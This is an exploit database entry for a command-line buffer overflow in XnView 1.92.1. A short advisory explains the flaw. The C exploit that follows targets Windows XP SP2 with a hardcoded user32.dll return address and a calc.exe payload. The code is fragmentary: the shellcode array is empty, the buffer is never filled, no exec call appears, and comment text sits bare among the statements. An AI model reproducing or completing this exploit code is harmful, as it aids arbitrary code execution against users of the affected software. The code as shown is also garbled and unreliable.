XnView 1.92.1 Command-Line Arguments Buffer Overflow Vulnerability

ID 1337DAY-ID-21860
Type zdt
Reporter Sylvain THUAL
Modified 2014-02-05T00:00:00


Exploit for windows platform in category remote exploits

                                            source: http://www.securityfocus.com/bid/28259/info
XnView is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
Attackers may exploit this issue only if XnView is configured as a handler for other applications, so that it can be passed malicious filenames as command-line data.
An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will result in a denial of service.
This issue affects XnView 1.92.1; other versions may also be vulnerable.
#include <unistd.h> 
Size=164 octets
Action: open calc.exe
unsigned char shellcode[] =
user32.dll ret adress ==> jmp ebp
under Win XP pro SP2
unsigned char ret[] ="\x34\x59\x40\x7e";
int main(int argc,char *argv[]){
char *bufExe[3];
char buf[511];
bufExe[0] = "xnview.exe";
bufExe[2] = NULL;
bufExe[1] = buf;
return 0x0;

#  0day.today [2018-03-28]  #